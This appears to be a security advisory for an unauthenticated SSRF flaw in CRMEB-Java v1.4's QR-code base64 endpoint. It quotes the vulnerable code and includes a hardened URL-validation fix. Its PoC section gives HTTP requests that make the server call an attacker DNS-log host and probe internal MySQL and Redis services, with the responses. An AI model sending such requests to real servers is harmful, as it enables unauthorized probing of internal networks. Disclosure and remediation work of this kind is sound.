Description
CRMEB-Java v1.4 contains a Server-Side Request Forgery (SSRF) vulnerability in the POST /api/front/qrcode/base64 endpoint. The url parameter is directly passed to RestTemplate.getForEntity() without any validation, allowing attackers to make arbitrary HTTP requests from the server. This endpoint is whitelisted in the authentication interceptor, requiring no login credentials.
Vulnerability Details
Vulnerable File: crmeb-common/src/main/java/com/zbkj/common/utils/RestTemplateUtil.java
public byte[] getBuffer(String url) {
    return restTemplate.getForEntity(url, byte[].class).getBody(); // no validation
}
Entry Point: crmeb-front/src/main/java/com/zbkj/front/controller/QrCodeController.java
@RequestMapping(value = "/base64", method = RequestMethod.POST)
public CommonResult<Map<String, Object>> get(@RequestParam String url) {
    return CommonResult.success(qrCodeService.base64(url));
}
Authentication Bypass: crmeb-front/src/main/java/com/zbkj/front/config/WebConfig.java
registry.addInterceptor(frontTokenInterceptor())
        .addPathPatterns("/api/front/**")
        .excludePathPatterns("/api/front/qrcode/**"); // no auth required
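As an added illustration of how the missing check could be implemented (example code written for this write-up, not CRMEB's own fix), the hardened getBuffer below only fetches http/https URLs whose host resolves exclusively to public addresses and replaces the verbose I/O error with a generic one. Class and method names are hypothetical.

```java
import java.net.InetAddress;
import java.net.URI;
import java.net.UnknownHostException;
import java.util.Set;
import org.springframework.web.client.RestTemplate;

// Hypothetical hardened replacement for RestTemplateUtil.getBuffer (not CRMEB's code).
public class SafeQrCodeFetcher {
    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");

    /** Returns true only when the URL is http/https and every address its host resolves to is public. */
    public static boolean isAllowedUrl(String raw) {
        URI uri;
        try {
            uri = new URI(raw);
        } catch (Exception e) {
            return false; // unparseable input is rejected outright
        }
        if (uri.getScheme() == null || !ALLOWED_SCHEMES.contains(uri.getScheme().toLowerCase())) return false;
        if (uri.getHost() == null || uri.getUserInfo() != null) return false; // no bare IPs via userinfo tricks
        InetAddress[] addrs;
        try {
            addrs = InetAddress.getAllByName(uri.getHost());
        } catch (UnknownHostException e) {
            return false;
        }
        for (InetAddress a : addrs) {
            if (!isPublic(a)) return false; // one internal record is enough to refuse
        }
        return true;
    }

    /** Rejects loopback, link-local, RFC 1918, IPv6 ULA, CGNAT, multicast and wildcard addresses. */
    static boolean isPublic(InetAddress a) {
        if (a.isAnyLocalAddress() || a.isLoopbackAddress() || a.isLinkLocalAddress()
                || a.isSiteLocalAddress() || a.isMulticastAddress()) return false;
        byte[] b = a.getAddress();
        if (b.length == 16 && (b[0] & 0xfe) == 0xfc) return false;                     // fc00::/7
        if (b.length == 4 && (b[0] & 0xff) == 100 && (b[1] & 0xc0) == 0x40) return false; // 100.64.0.0/10
        return true;
    }

    /** Validates before fetching and never echoes the target URL back in the error message. */
    public byte[] getBuffer(RestTemplate restTemplate, String url) {
        if (!isAllowedUrl(url)) throw new IllegalArgumentException("URL not permitted");
        try {
            return restTemplate.getForEntity(url, byte[].class).getBody();
        } catch (Exception e) {
            throw new IllegalStateException("Failed to fetch image"); // generic, no internal detail
        }
    }
}
```

The check resolves the host separately from the HTTP client, so a complete fix should also pin the connection to the validated address (or use a fixed host allowlist) and disable redirect following, since the default HttpURLConnection-backed RestTemplate would otherwise follow a redirect to an internal host after validation.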
PoC
1. Verify SSRF via DNS callback
POST /api/front/qrcode/base64 HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
url=http://<your-dnslog-domain>
Check DNS log for callback from the server, confirming SSRF.
2. Internal network probing
POST /api/front/qrcode/base64 HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
url=http://mysql:3306
Response:
{"code":500,"message":"I/O error on GET request for \"http://mysql:3306\": Invalid Http response"}
POST /api/front/qrcode/base64 HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
url=http://redis:6379
Response:
{"code":500,"message":"I/O error on GET request for \"http://redis:6379\": Invalid Http response"}
Error messages confirm the server successfully connected to internal MySQL and Redis services.